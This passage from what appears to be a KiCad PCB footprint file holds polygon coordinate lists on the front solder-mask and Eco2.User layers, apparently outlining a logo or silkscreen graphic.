(xy -7.27121 4.232232) (xy -7.188277 4.361064) (xy -7.107146 4.483282) (xy -7.028802 4.597198)
(xy -6.954231 4.701125) (xy -6.92125 4.745398) (xy -6.813296 4.893603) (xy -6.709295 5.046643)
(xy -6.610319 5.202556) (xy -6.517442 5.359379) (xy -6.431738 5.515149) (xy -6.354281 5.667901)
(xy -6.286143 5.815674) (xy -6.228398 5.956503) (xy -6.182119 6.088426) (xy -6.175813 6.1087)
(xy -6.16751 6.137244) (xy -6.161322 6.16299) (xy -6.156858 6.189428) (xy -6.153724 6.220046)
(xy -6.151527 6.258335) (xy -6.149876 6.307782) (xy -6.148902 6.347884) (xy -6.145242 6.510867)
(xy -6.390813 6.510867) (xy -6.43179 6.477906) (xy -6.463384 6.450222) (xy -6.505014 6.410031)
(xy -6.556064 6.357989) (xy -6.615919 6.294751) (xy -6.683963 6.220974) (xy -6.759581 6.137314)
(xy -6.842155 6.044427) (xy -6.893561 5.985934) (xy -6.936483 5.937829) (xy -6.983677 5.886487)
(xy -7.031146 5.836156) (xy -7.074892 5.791086) (xy -7.104671 5.761529) (xy -7.2744 5.59686)
(xy -7.442508 5.433075) (xy -7.61079 5.268402) (xy -7.781041 5.101073) (xy -7.955058 4.929316)
(xy -8.134635 4.751363) (xy -8.321568 4.565442) (xy -8.517652 4.369785) (xy -8.602578 4.284871)
(xy -8.741764 4.145514) (xy -8.869435 4.017423) (xy -8.986143 3.899987) (xy -9.092445 3.792597)
(xy -9.188895 3.694644) (xy -9.276049 3.605517) (xy -9.35446 3.524606) (xy -9.424685 3.451302)
(xy -9.487277 3.384996) (xy -9.542793 3.325077) (xy -9.591787 3.270936) (xy -9.634813 3.221964)
(xy -9.672428 3.177549) (xy -9.705185 3.137083) (xy -9.73364 3.099956) (xy -9.758347 3.065559)
(xy -9.779862 3.033281) (xy -9.79874 3.002512) (xy -9.815535 2.972644) (xy -9.830803 2.943066)
(xy -9.838764 2.926673) (xy -9.858377 2.883532) (xy -9.873148 2.845164) (xy -9.883738 2.807915)
(xy -9.89081 2.76813) (xy -9.895025 2.722155) (xy -9.897045 2.666336) (xy -9.897534 2.602138)
(xy -9.896931 2.531229) (xy -9.894872 2.474699) (xy -9.890978 2.43003) (xy -9.884872 2.394704)
(xy -9.876177 2.366201) (xy -9.864516 2.342003) (xy -9.856688 2.329598) (xy -9.850912 2.321846)
(xy -9.841592 2.310524) (xy -9.828084 2.294936) (xy -9.809739 2.274386) (xy -9.785913 2.248178)
(xy -9.755958 2.215618) (xy -9.719229 2.176007) (xy -9.675079 2.128652) (xy -9.622862 2.072855)
(xy -9.561931 2.007922) (xy -9.491641 1.933156) (xy -9.411344 1.847861) (xy -9.320395 1.751342)
(xy -9.267024 1.694732) (xy -9.246281 1.671793) (xy -9.231125 1.653239) (xy -9.224513 1.642719)
(xy -9.224434 1.642185) (xy -9.231324 1.635419) (xy -9.25023 1.621945) (xy -9.278509 1.603529)
(xy -9.313514 1.581934) (xy -9.325379 1.574835) (xy -9.496219 1.468865) (xy -9.658777 1.359068)
(xy -9.812182 1.246263) (xy -9.834332 1.228498) (xy -2.183907 1.228498) (xy -2.175949 1.302296)
(xy -2.15815 1.381469) (xy -2.140696 1.439334) (xy -2.095151 1.552002) (xy -2.034104 1.659523)
(xy -1.95841 1.761132) (xy -1.868922 1.856065) (xy -1.766496 1.943558) (xy -1.651984 2.022846)
(xy -1.526242 2.093166) (xy -1.390124 2.153753) (xy -1.309041 2.183362) (xy -1.271441 2.196041)
(xy -1.242284 2.204987) (xy -1.217896 2.2102) (xy -1.194606 2.211677) (xy -1.16874 2.209418)
(xy -1.136626 2.203422) (xy -1.094591 2.193687) (xy -1.051625 2.183271) (xy -0.916442 2.143319)
(xy -0.793578 2.091858) (xy -0.682766 2.02871) (xy -0.583737 1.953696) (xy -0.496226 1.866636)
(xy -0.419964 1.76735) (xy -0.410258 1.752601) (xy -0.378563 1.70108) (xy -0.352732 1.652721)
(xy -0.329848 1.601432) (xy -0.306995 1.541118) (xy -0.301303 1.524943) (xy -0.271697 1.431203)
(xy -0.251312 1.344374) (xy -0.239042 1.257946) (xy -0.233776 1.165414) (xy -0.233679 1.155617)
(xy 1.45403 1.155617) (xy 1.462288 1.234054) (xy 1.480512 1.32003) (xy 1.508073 1.410976)
(xy 1.54434 1.504323) (xy 1.574988 1.570567) (xy 1.591807 1.603926) (xy 1.607515 1.633121)
(xy 1.62378 1.660543) (xy 1.642266 1.688582) (xy 1.66464 1.719628) (xy 1.692568 1.756072)
(xy 1.727716 1.800304) (xy 1.771751 1.854715) (xy 1.78075 1.865775) (xy 1.858865 1.950648)
(xy 1.944114 2.022739) (xy 2.034817 2.080901) (xy 2.129289 2.12399) (xy 2.186424 2.14196)
(xy 2.237093 2.153199) (xy 2.281747 2.157646) (xy 2.327441 2.155434) (xy 2.381231 2.146699)
(xy 2.38584 2.145775) (xy 2.46893 2.124712) (xy 2.56096 2.093987) (xy 2.658257 2.055236)
(xy 2.757149 2.010095) (xy 2.853962 1.960199) (xy 2.945024 1.907186) (xy 2.996873 1.873545)
(xy 3.074955 1.81483) (xy 3.139353 1.753276) (xy 3.193308 1.685527) (xy 3.222319 1.639991)
(xy 3.272253 1.541) (xy 3.30939 1.437053) (xy 3.333089 1.331082) (xy 3.342711 1.226023)
(xy 3.337614 1.124808) (xy 3.336529 1.116807) (xy 3.317333 1.008432) (xy 3.289842 0.890841)
(xy 3.255514 0.768657) (xy 3.215809 0.646505) (xy 3.172185 0.529011) (xy 3.126101 0.420799)
(xy 3.099494 0.365443) (xy 3.074672 0.326946) (xy 3.037262 0.283022) (xy 2.989782 0.235898)
(xy 2.93475 0.187799) (xy 2.874683 0.140952) (xy 2.812099 0.097581) (xy 2.76163 0.066723)
(xy 2.720713 0.045327) (xy 2.672323 0.02311) (xy 2.621665 0.002192) (xy 2.573946 -0.015311)
(xy 2.534371 -0.027279) (xy 2.525535 -0.029334) (xy 2.498371 -0.035057) (xy 2.534987 0.019546)
(xy 2.57656 0.093943) (xy 2.611293 0.182546) (xy 2.630588 0.249767) (xy 2.636457 0.283672)
(xy 2.641042 0.331191) (xy 2.644346 0.389055) (xy 2.646369 0.453993) (xy 2.647113 0.522735)
(xy 2.646579 0.592012) (xy 2.64477 0.658552) (xy 2.641686 0.719087) (xy 2.637329 0.770346)
(xy 2.631701 0.809058) (xy 2.630325 0.81543) (xy 2.601065 0.913043) (xy 2.561917 1.000342)
(xy 2.513756 1.076317) (xy 2.45746 1.139961) (xy 2.393905 1.190265) (xy 2.323969 1.226221)
(xy 2.256366 1.245467) (xy 2.226637 1.248896) (xy 2.183502 1.25108) (xy 2.130447 1.251918)
(xy 2.070961 1.25131) (xy 2.061633 1.251086) (xy 2.005961 1.24937) (xy 1.963889 1.247245)
(xy 1.932081 1.244318) (xy 1.907203 1.240199) (xy 1.885921 1.234496) (xy 1.869097 1.228473)
(xy 1.801442 1.193363) (xy 1.739061 1.143489) (xy 1.683196 1.080532) (xy 1.635088 1.006173)
(xy 1.595978 0.922096) (xy 1.567107 0.829981) (xy 1.563478 0.814417) (xy 1.544083 0.727133)
(xy 1.516926 0.814417) (xy 1.484423 0.932334) (xy 1.462276 1.0452) (xy 1.45637 1.087288)
(xy 1.45403 1.155617) (xy -0.233679 1.155617) (xy -0.233383 1.126067) (xy -0.238484 1.002109)
(xy -0.254206 0.885619) (xy -0.28153 0.772489) (xy -0.321435 0.65861) (xy -0.37184 0.5461)
(xy -0.439488 0.42467) (xy -0.51647 0.317366) (xy -0.602779 0.224194) (xy -0.698409 0.145157)
(xy -0.803355 0.080258) (xy -0.917611 0.029503) (xy -1.041171 -0.007104) (xy -1.17403 -0.029561)
(xy -1.17475 -0.029641) (xy -1.202075 -0.032111) (xy -1.221187 -0.032749) (xy -1.227667 -0.031585)
(xy -1.22328 -0.023193) (xy -1.211643 -0.004453) (xy -1.195036 0.020989) (xy -1.190414 0.027912)
(xy -1.168176 0.064924) (xy -1.145642 0.108622) (xy -1.127679 0.149566) (xy -1.127634 0.149683)
(xy -1.111694 0.194137) (xy -1.09921 0.237145) (xy -1.0898 0.281647) (xy -1.083084 0.330587)
(xy -1.078682 0.386905) (xy -1.076214 0.453544) (xy -1.075298 0.533446) (xy -1.075267 0.554567)
(xy -1.075703 0.63171) (xy -1.07709 0.694369) (xy -1.079552 0.744976) (xy -1.08321 0.785959)
(xy -1.088184 0.81975) (xy -1.088687 0.822449) (xy -1.114034 0.920952) (xy -1.150678 1.011301)
(xy -1.197567 1.091936) (xy -1.253652 1.161295) (xy -1.317882 1.217816) (xy -1.380067 1.255577)
(xy -1.4351 1.282701) (xy -1.6383 1.282701) (xy -1.702172 1.282655) (xy -1.751571 1.282375)
(xy -1.788958 1.281642) (xy -1.816796 1.280241) (xy -1.837544 1.277955) (xy -1.853664 1.274566)
(xy -1.867616 1.269858) (xy -1.881863 1.263615) (xy -1.888067 1.260699) (xy -1.960946 1.217055)
(xy -2.026246 1.158512) (xy -2.084133 1.084899) (xy -2.120645 1.02373) (xy -2.13312 1.000626)
(xy -2.142083 0.986984) (xy -2.14876 0.984102) (xy -2.154379 0.99328) (xy -2.160166 1.015815)
(xy -2.167347 1.053008) (xy -2.171944 1.078051) (xy -2.182435 1.15533) (xy -2.183907 1.228498)
(xy -9.834332 1.228498) (xy -9.955566 1.131268) (xy -10.088058 1.014901) (xy -10.208788 0.89798)
(xy -10.316888 0.781324) (xy -10.411488 0.66575) (xy -10.491717 0.552078) (xy -10.556707 0.441124)
(xy -10.57962 0.394735) (xy -10.619741 0.308486) (xy -10.775458 0.229143) (xy -11.006694 0.106076)
(xy -11.222289 -0.019477) (xy -11.422106 -0.147403) (xy -11.606007 -0.277587) (xy -11.773852 -0.409915)
(xy -11.925505 -0.544271) (xy -12.060826 -0.680542) (xy -12.179678 -0.818611) (xy -12.281923 -0.958366)
(xy -12.359401 -1.08508) (xy -12.404665 -1.176011) (xy -12.446029 -1.277247) (xy -12.481437 -1.382803)
(xy -12.508834 -1.486693) (xy -12.523224 -1.562099) (xy -12.527988 -1.604816) (xy -12.531548 -1.660638)
(xy -12.533927 -1.726277) (xy -12.535149 -1.798445) (xy -12.535238 -1.873852) (xy -12.534216 -1.949212)
(xy -12.532107 -2.021235) (xy -12.528935 -2.086633) (xy -12.524723 -2.142119) (xy -12.519494 -2.184403)
(xy -12.518763 -2.188633) (xy -12.485137 -2.334902) (xy -12.437275 -2.478343) (xy -12.374641 -2.620067)
(xy -12.296701 -2.761184) (xy -12.20292 -2.902804) (xy -12.125321 -3.005666) (xy -12.091897 -3.045626)
(xy -12.049117 -3.093395) (xy -11.999933 -3.145968) (xy -11.947296 -3.200337) (xy -11.894158 -3.253497)
(xy -11.843472 -3.302442) (xy -11.798189 -3.344166) (xy -11.764903 -3.372724) (xy -11.706106 -3.420533)
(xy -11.475264 -3.420533) (xy -11.464632 -3.350683) (xy -11.439686 -3.214506) (xy -11.405347 -3.069317)
(xy -11.362877 -2.919267) (xy -11.313535 -2.768505) (xy -11.258582 -2.621183) (xy -11.203642 -2.491117)
(xy -11.152187 -2.38399) (xy -11.091643 -2.270393) (xy -11.024621 -2.154623) (xy -10.953732 -2.040977)
(xy -10.881587 -1.933751) (xy -10.810798 -1.837243) (xy -10.79089 -1.811866) (xy -10.75085 -1.762569)
(xy -10.710825 -1.714873) (xy -10.672263 -1.670351) (xy -10.636612 -1.630576) (xy -10.605321 -1.59712)
(xy -10.579837 -1.571555) (xy -10.56161 -1.555454) (xy -10.552088 -1.550389) (xy -10.55108 -1.55151)
(xy -10.551609 -1.563013) (xy -10.554357 -1.589151) (xy -10.559051 -1.627808) (xy -10.565422 -1.676871)
(xy -10.573196 -1.734225) (xy -10.582104 -1.797754) (xy -10.587401 -1.834648) (xy -10.59522 -1.88867)
(xy -10.605156 -1.957334) (xy -10.616904 -2.038527) (xy -10.630158 -2.130131) (xy -10.644612 -2.230032)
(xy -10.65996 -2.336114) (xy -10.675895 -2.44626) (xy -10.692111 -2.558356) (xy -10.708303 -2.670286)
(xy -10.71885 -2.743199) (xy -10.734255 -2.849674) (xy -10.749438 -2.954571) (xy -10.764151 -3.056183)
(xy -10.778147 -3.152802) (xy -10.791177 -3.242718) (xy -10.802995 -3.324223) (xy -10.813353 -3.395609)
(xy -10.822002 -3.455166) (xy -10.828696 -3.501186) (xy -10.832792 -3.529269) (xy -10.844841 -3.623372)
(xy -10.851814 -3.708262) (xy -10.854252 -3.7907) (xy -10.854267 -3.798086) (xy -10.854267 -3.920066)
(xy -10.626479 -3.920066) (xy -10.47579 -3.844472) (xy -10.249531 -3.724603) (xy -10.039564 -3.600166)
(xy -9.845871 -3.471142) (xy -9.668432 -3.337509) (xy -9.507227 -3.199245) (xy -9.362238 -3.05633)
(xy -9.233445 -2.908741) (xy -9.120829 -2.756459) (xy -9.024371 -2.599461) (xy -8.94405 -2.437726)
(xy -8.879849 -2.271232) (xy -8.831747 -2.09996) (xy -8.813421 -2.010833) (xy -8.799749 -1.916444)
(xy -8.790109 -1.809363) (xy -8.784449 -1.693334) (xy -8.782718 -1.572099) (xy -8.784865 -1.449401)
(xy -8.790839 -1.328982) (xy -8.800589 -1.214586) (xy -8.814063 -1.109953) (xy -8.826697 -1.039579)
(xy -8.872812 -0.854781) (xy -8.934675 -0.667969) (xy -9.011523 -0.480893) (xy -9.102596 -0.295301)
(xy -9.207132 -0.112942) (xy -9.278711 -0.001764) (xy -9.303049 0.034474) (xy -9.324476 0.066429)
(xy -9.340962 0.091068) (xy -9.350475 0.105359) (xy -9.351434 0.106819) (xy -9.349994 0.119495)
(xy -9.336028 0.140275) (xy -9.311085 0.16785) (xy -9.276714 0.200908) (xy -9.234463 0.23814)
(xy -9.185881 0.278236) (xy -9.132518 0.319886) (xy -9.075921 0.361779) (xy -9.017641 0.402605)
(xy -8.959226 0.441054) (xy -8.947694 0.448324) (xy -8.90824 0.472017) (xy -8.860332 0.499203)
(xy -8.806045 0.528849) (xy -8.747449 0.559922) (xy -8.686619 0.591391) (xy -8.625627 0.622221)
(xy -8.566546 0.651382) (xy -8.511449 0.677839) (xy -8.462408 0.700561) (xy -8.421497 0.718515)
(xy -8.390788 0.730669) (xy -8.372354 0.735989) (xy -8.369933 0.736132) (xy -8.359004 0.729658)
(xy -8.344618 0.714525) (xy -8.343306 0.712849) (xy -8.325779 0.690034) (xy -8.572698 0.332845)
(xy -8.634266 0.243463) (xy -8.686466 0.166963) (xy -8.729844 0.1025) (xy -8.764949 0.04923)
(xy -8.792327 0.006307) (xy -8.812526 -0.027112) (xy -8.826094 -0.051873) (xy -8.833578 -0.068819)
(xy -8.834135 -0.070499) (xy -8.839233 -0.089374) (xy -8.842897 -0.110564) (xy -8.845279 -0.136867)
(xy -8.846532 -0.171084) (xy -8.846807 -0.216013) (xy -8.846257 -0.274453) (xy -8.846043 -0.28927)
(xy -8.843434 -0.461887) (xy -8.815562 -0.518455) (xy -8.793021 -0.557194) (xy -8.76727 -0.590629)
(xy -8.753214 -0.604532) (xy -8.743335 -0.613198) (xy -8.734567 -0.620923) (xy -8.725957 -0.627913)
(xy -8.71655 -0.634372) (xy -8.705393 -0.640503) (xy -8.69153 -0.646512) (xy -8.674009 -0.652603)
(xy -8.651876 -0.65898) (xy -8.624175 -0.665849) (xy -8.589953 -0.673412) (xy -8.548256 -0.681875)
(xy -8.49813 -0.691442) (xy -8.43862 -0.702318) (xy -8.368773 -0.714707) (xy -8.287635 -0.728813)
(xy -8.194252 -0.744842) (xy -8.087668 -0.762996) (xy -7.966931 -0.783482) (xy -7.831087 -0.806502)
(xy -7.733304 -0.82308) (xy -7.681507 -0.831865) (xy -7.653817 -0.889102) (xy -7.626128 -0.94634)
(xy -7.792381 -1.327192) (xy -7.825859 -1.403957) (xy -7.857679 -1.477062) (xy -7.887113 -1.544827)
(xy -7.913434 -1.60557) (xy -7.935916 -1.657611) (xy -7.953831 -1.699269) (xy -7.966451 -1.728864)
(xy -7.97305 -1.744715) (xy -7.973218 -1.745139) (xy -7.978359 -1.760892) (xy -7.982187 -1.780084)
(xy -7.984885 -1.805314) (xy -7.986636 -1.83918) (xy -7.987621 -1.884281) (xy -7.988025 -1.943217)
(xy -7.988051 -1.956246) (xy -7.9883 -2.13026) (xy -7.956029 -2.195549) (xy -7.918688 -2.254987)
(xy -7.872041 -2.300483) (xy -7.815351 -2.332701) (xy -7.795388 -2.340175) (xy -7.767852 -2.345809)
(xy -7.72346 -2.349924) (xy -7.662224 -2.35252) (xy -7.584152 -2.353596) (xy -7.489254 -2.353154)
(xy -7.377541 -2.351192) (xy -7.249022 -2.34771) (xy -7.103707 -2.34271) (xy -7.066094 -2.341274)
(xy -6.994979 -2.338607) (xy -6.929246 -2.336324) (xy -6.870802 -2.334477) (xy -6.821555 -2.333119)
(xy -6.783411 -2.332301) (xy -6.758278 -2.332078) (xy -6.748063 -2.3325) (xy -6.747979 -2.332538)
(xy -6.740722 -2.340359) (xy -6.725839 -2.358502) (xy -6.705912 -2.38378) (xy -6.694474 -2.398607)
(xy -6.646477 -2.461271) (xy -6.737062 -2.854119) (xy -6.827648 -3.246966) (xy -6.827819 -3.424766)
(xy -6.827603 -3.491643) (xy -6.826418 -3.544383) (xy -6.823679 -3.585778) (xy -6.818801 -3.618623)
(xy -6.811198 -3.645709) (xy -6.800285 -3.669828) (xy -6.785476 -3.693773) (xy -6.766185 -3.720337)
(xy -6.765711 -3.720966) (xy -6.72453 -3.763526) (xy -6.679115 -3.793453) (xy -6.625167 -3.8227)
(xy -6.294967 -3.828132) (xy -5.913967 -3.7341) (xy -5.835907 -3.715019) (xy -5.762506 -3.697432)
(xy -5.695474 -3.681724) (xy -5.636521 -3.668278) (xy -5.587359 -3.65748) (xy -5.549698 -3.649713)
(xy -5.525249 -3.645362) (xy -5.516034 -3.644661) (xy -5.502169 -3.652316) (xy -5.480187 -3.668638)
(xy -5.454159 -3.690534) (xy -5.446007 -3.697876) (xy -5.392913 -3.7465) (xy -5.406396 -4.119033)
(xy -5.409281 -4.204588) (xy -5.41182 -4.291412) (xy -5.413956 -4.376628) (xy -5.415632 -4.457359)
(xy -5.416789 -4.530727) (xy -5.417369 -4.593855) (xy -5.417317 -4.643866) (xy -5.417156 -4.656666)
(xy -5.41611 -4.713951) (xy -5.414894 -4.757207) (xy -5.413165 -4.789341) (xy -5.410581 -4.813257)
(xy -5.406799 -4.83186) (xy -5.401475 -4.848055) (xy -5.394267 -4.864747) (xy -5.392014 -4.869586)
(xy -5.355985 -4.927235) (xy -5.307492 -4.975554) (xy -5.250587 -5.010902) (xy -5.231974 -5.019116)
(xy -5.214546 -5.025118) (xy -5.195076 -5.029333) (xy -5.170337 -5.032183) (xy -5.137102 -5.034092)
(xy -5.092144 -5.035483) (xy -5.057301 -5.036265) (xy -4.994929 -5.036855) (xy -4.940756 -5.035939)
(xy -4.897614 -5.033614) (xy -4.868334 -5.029979) (xy -4.866895 -5.029682) (xy -4.851566 -5.025008)
(xy -4.826576 -5.015395) (xy -4.791346 -5.000577) (xy -4.745295 -4.980286) (xy -4.687843 -4.954255)
(xy -4.618411 -4.92222) (xy -4.536418 -4.883911) (xy -4.441284 -4.839064) (xy -4.33243 -4.787411)
(xy -4.209275 -4.728685) (xy -4.137372 -4.694299) (xy -4.062576 -4.658497) (xy -4.009916 -4.688609)
(xy -3.957256 -4.71872) (xy -3.878693 -5.223101) (xy -3.861471 -5.33348) (xy -3.846507 -5.428456)
(xy -3.833472 -5.509359) (xy -3.822036 -5.577519) (xy -3.811868 -5.634267) (xy -3.802639 -5.680934)
(xy -3.794018 -5.718851) (xy -3.785676 -5.749347) (xy -3.777282 -5.773753) (xy -3.768507 -5.793401)
(xy -3.75902 -5.809621) (xy -3.748492 -5.823742) (xy -3.736592 -5.837097) (xy -3.72299 -5.851015)
(xy -3.722945 -5.851061) (xy -3.69367 -5.875878) (xy -3.658779 -5.899189) (xy -3.640667 -5.908867)
(xy -3.62302 -5.916721) (xy -3.606359 -5.922517) (xy -3.58762 -5.926635) (xy -3.563741 -5.929455)
(xy -3.531661 -5.931358) (xy -3.488317 -5.932722) (xy -3.440256 -5.933745) (xy -3.371022 -5.934405)
(xy -3.31562 -5.933002) (xy -3.271012 -5.928947) (xy -3.23416 -5.921651) (xy -3.202027 -5.910525)
(xy -3.171576 -5.894979) (xy -3.141829 -5.875849) (xy -3.125505 -5.86416) (xy -3.09724 -5.843428)
(xy -3.058604 -5.814822) (xy -3.011162 -5.779511) (xy -2.956483 -5.738665) (xy -2.896135 -5.693451)
(xy -2.831686 -5.64504) (xy -2.769328 -5.598087) (xy -2.444088 -5.352908) (xy -2.409423 -5.364719)
(xy -2.374758 -5.376531) (xy -2.210404 -5.835748) (xy -2.179761 -5.92112) (xy -2.150319 -6.002666)
(xy -2.122658 -6.078816) (xy -2.097354 -6.148003) (xy -2.074986 -6.208659) (xy -2.056131 -6.259213)
(xy -2.041367 -6.298099) (xy -2.031272 -6.323748) (xy -2.02717 -6.333234) (xy -1.997666 -6.377595)
(xy -1.956469 -6.418722) (xy -1.908765 -6.45202) (xy -1.875129 -6.467895) (xy -1.856831 -6.474331)
(xy -1.839403 -6.479039) (xy -1.819938 -6.48223) (xy -1.795531 -6.484118) (xy -1.763277 -6.484914)
(xy -1.720269 -6.484831) (xy -1.663601 -6.484081) (xy -1.655424 -6.483951) (xy -1.4859 -6.481233)
(xy -1.434236 -6.453204) (xy -1.422137 -6.446066) (xy -1.409169 -6.436981) (xy -1.394341 -6.424918)
(xy -1.376665 -6.408848) (xy -1.355149 -6.387743) (xy -1.328806 -6.360572) (xy -1.296645 -6.326306)
(xy -1.257677 -6.283916) (xy -1.210911 -6.232372) (xy -1.155358 -6.170644) (xy -1.090029 -6.097704)
(xy -1.057778 -6.061621) (xy -0.981335 -5.976299) (xy -0.915492 -5.903348) (xy -0.85981 -5.842301)
(xy -0.813849 -5.792691) (xy -0.777168 -5.75405) (xy -0.749327 -5.72591) (xy -0.729887 -5.707805)
(xy -0.718406 -5.699266) (xy -0.715742 -5.69842) (xy -0.710386 -5.701251) (xy -0.701947 -5.710198)
(xy -0.689842 -5.726188) (xy -0.673487 -5.750147) (xy -0.652297 -5.783002) (xy -0.625687 -5.82568)
(xy -0.593073 -5.879108) (xy -0.553871 -5.944212) (xy -0.507497 -6.02192) (xy -0.453365 -6.113158)
(xy -0.440267 -6.13529) (xy -0.383771 -6.230681) (xy -0.335034 -6.31259) (xy -0.29326 -6.382145)
(xy -0.257651 -6.440476) (xy -0.227411 -6.488712) (xy -0.20174 -6.527982) (xy -0.179843 -6.559416)
(xy -0.160921 -6.584142) (xy -0.144178 -6.60329) (xy -0.128816 -6.617989) (xy -0.114037 -6.629369)
(xy -0.099045 -6.638558) (xy -0.083041 -6.646685) (xy -0.077237 -6.649403) (xy -0.063063 -6.655431)
(xy -0.04843 -6.659954) (xy -0.030732 -6.663188) (xy -0.00736 -6.665345) (xy 0.024292 -6.666639)
(xy 0.066833 -6.667283) (xy 0.122871 -6.667491) (xy 0.143933 -6.6675) (xy 0.204806 -6.667386)) (layer F.Mask) (width 0.01))
(fp_poly (pts (xy 2.375655 1.004383) (xy 2.364773 1.017455) (xy 2.362199 1.020234) (xy 2.347714 1.034474)
(xy 2.338593 1.041298) (xy 2.338081 1.041401) (xy 2.340277 1.036084) (xy 2.351159 1.023012)
(xy 2.353733 1.020234) (xy 2.368219 1.005994) (xy 2.377339 0.999169) (xy 2.377851 0.999067)
(xy 2.375655 1.004383)) (layer Eco2.User) (width 0.01))
(fp_poly (pts (xy 0.20217 -6.55362) (xy 0.250122 -6.541287) (xy 0.29307 -6.518417) (xy 0.329501 -6.489324)
(xy 0.337191 -6.482017) (xy 0.345211 -6.473391) (xy 0.354212 -6.462404) (xy 0.364843 -6.448013)
(xy 0.377754 -6.429174) (xy 0.393596 -6.404845) (xy 0.413019 -6.373984) (xy 0.436674 -6.335548)
(xy 0.46521 -6.288494) (xy 0.499278 -6.23178) (xy 0.539527 -6.164362) (xy 0.586609 -6.085199)
(xy 0.641173 -5.993247) (xy 0.685658 -5.9182) (xy 0.739084 -5.828124) (xy 0.784022 -5.75254)
(xy 0.820542 -5.691327) (xy 0.848718 -5.644365) (xy 0.868619 -5.611537) (xy 0.880318 -5.592721)
(xy 0.883853 -5.58766) (xy 0.89667 -5.58522) (xy 0.921604 -5.582189) (xy 0.954875 -5.578869)
(xy 0.992705 -5.575558) (xy 1.031313 -5.572557) (xy 1.066921 -5.570165) (xy 1.09575 -5.568683)
(xy 1.114019 -5.56841) (xy 1.118463 -5.569044) (xy 1.125907 -5.577351) (xy 1.142384 -5.595855)
(xy 1.165693 -5.62208) (xy 1.193634 -5.653552) (xy 1.203459 -5.664625) (xy 1.29769 -5.770794)
(xy 1.381433 -5.865001) (xy 1.455389 -5.947998) (xy 1.52026 -6.020532) (xy 1.576746 -6.083353)
(xy 1.625549 -6.137211) (xy 1.667371 -6.182854) (xy 1.702911 -6.221032) (xy 1.732872 -6.252495)
(xy 1.757954 -6.277991) (xy 1.778859 -6.298269) (xy 1.796288 -6.31408) (xy 1.810942 -6.326172)
(xy 1.823522 -6.335295) (xy 1.83473 -6.342198) (xy 1.840346 -6.345209) (xy 1.90113 -6.367302)
(xy 1.964391 -6.37416) (xy 2.02721 -6.366508) (xy 2.086663 -6.345074) (xy 2.139831 -6.310587)
(xy 2.183792 -6.263771) (xy 2.187301 -6.258829) (xy 2.192839 -6.250621) (xy 2.198201 -6.241893)
(xy 2.203837 -6.231459) (xy 2.210197 -6.218132) (xy 2.217732 -6.200726) (xy 2.226892 -6.178053)
(xy 2.238126 -6.148926) (xy 2.251885 -6.112159) (xy 2.268619 -6.066565) (xy 2.288779 -6.010956)
(xy 2.312813 -5.944147) (xy 2.341174 -5.864949) (xy 2.37431 -5.772177) (xy 2.412672 -5.664643)
(xy 2.41283 -5.6642) (xy 2.440461 -5.587088) (xy 2.466631 -5.514747) (xy 2.49075 -5.448765)
(xy 2.512223 -5.390731) (xy 2.530459 -5.342233) (xy 2.544866 -5.304859) (xy 2.554851 -5.280199)
(xy 2.559822 -5.26984) (xy 2.559927 -5.269727) (xy 2.571008 -5.26411) (xy 2.594429 -5.25499)
(xy 2.626286 -5.24365) (xy 2.662676 -5.231373) (xy 2.699696 -5.219444) (xy 2.733442 -5.209144)
(xy 2.760012 -5.20176) (xy 2.775503 -5.198572) (xy 2.776424 -5.198533) (xy 2.784825 -5.203496)
(xy 2.805495 -5.217786) (xy 2.837208 -5.2405) (xy 2.878735 -5.270737) (xy 2.92885 -5.307596)
(xy 2.986327 -5.350174) (xy 3.049939 -5.397569) (xy 3.118458 -5.448882) (xy 3.177655 -5.493405)
(xy 3.271641 -5.563946) (xy 3.355257 -5.62611) (xy 3.428058 -5.679579) (xy 3.489602 -5.724035)
(xy 3.539444 -5.75916) (xy 3.577141 -5.784635) (xy 3.60225 -5.800142) (xy 3.611158 -5.804555)
(xy 3.668208 -5.818572) (xy 3.729736 -5.820134) (xy 3.789288 -5.809433) (xy 3.818853 -5.798394)
(xy 3.87385 -5.767021) (xy 3.916447 -5.727946) (xy 3.950717 -5.677374) (xy 3.952677 -5.673741)
(xy 3.958448 -5.662381) (xy 3.963732 -5.650271) (xy 3.968794 -5.636013) (xy 3.973902 -5.61821)
(xy 3.979323 -5.595461) (xy 3.985323 -5.566368) (xy 3.992169 -5.529533) (xy 4.000128 -5.483557)
(xy 4.009467 -5.427041) (xy 4.020451 -5.358586) (xy 4.033349 -5.276794) (xy 4.048427 -5.180266)
(xy 4.055676 -5.133693) (xy 4.069615 -5.044224) (xy 4.082872 -4.959408) (xy 4.095202 -4.880786)
(xy 4.106363 -4.809894) (xy 4.116111 -4.748272) (xy 4.124203 -4.697457) (xy 4.130396 -4.658989)
(xy 4.134447 -4.634405) (xy 4.136025 -4.625568) (xy 4.143693 -4.613949) (xy 4.16308 -4.598193)
(xy 4.195459 -4.577399) (xy 4.240624 -4.551485) (xy 4.277812 -4.531083) (xy 4.30963 -4.514038)
(xy 4.333197 -4.501863) (xy 4.345627 -4.496072) (xy 4.346676 -4.4958) (xy 4.355146 -4.499336)
(xy 4.377525 -4.509515) (xy 4.412439 -4.525692) (xy 4.458513 -4.547221) (xy 4.514373 -4.573457)
(xy 4.578643 -4.603753) (xy 4.649948 -4.637466) (xy 4.726914 -4.673948) (xy 4.790233 -4.704027)
(xy 4.902335 -4.757085) (xy 4.999543 -4.80257) (xy 5.082062 -4.840573) (xy 5.150097 -4.871187)
(xy 5.203853 -4.894502) (xy 5.243536 -4.910611) (xy 5.26935 -4.919605) (xy 5.276208 -4.921302)
(xy 5.337977 -4.924706) (xy 5.398677 -4.912856) (xy 5.455639 -4.887354) (xy 5.506194 -4.849804)
(xy 5.547672 -4.801807) (xy 5.577405 -4.744968) (xy 5.579529 -4.739145) (xy 5.584419 -4.72337)
(xy 5.588441 -4.705444) (xy 5.591606 -4.684005) (xy 5.593922 -4.657693) (xy 5.595399 -4.625144)
(xy 5.596046 -4.584996) (xy 5.595874 -4.535889) (xy 5.59489 -4.47646) (xy 5.593105 -4.405346)
(xy 5.590528 -4.321187) (xy 5.587167 -4.222619) (xy 5.58374 -4.1275) (xy 5.580963 -4.049845)
(xy 5.578395 -3.974479) (xy 5.576109 -3.903777) (xy 5.574176 -3.840111) (xy 5.572668 -3.785856)
(xy 5.571656 -3.743387) (xy 5.571212 -3.715076) (xy 5.571199 -3.711959) (xy 5.571066 -3.635085)
(xy 5.65743 -3.561675) (xy 5.690039 -3.534552) (xy 5.718541 -3.511953) (xy 5.740247 -3.495929)
(xy 5.75247 -3.488532) (xy 5.75362 -3.488266) (xy 5.763472 -3.490261) (xy 5.788217 -3.495996)
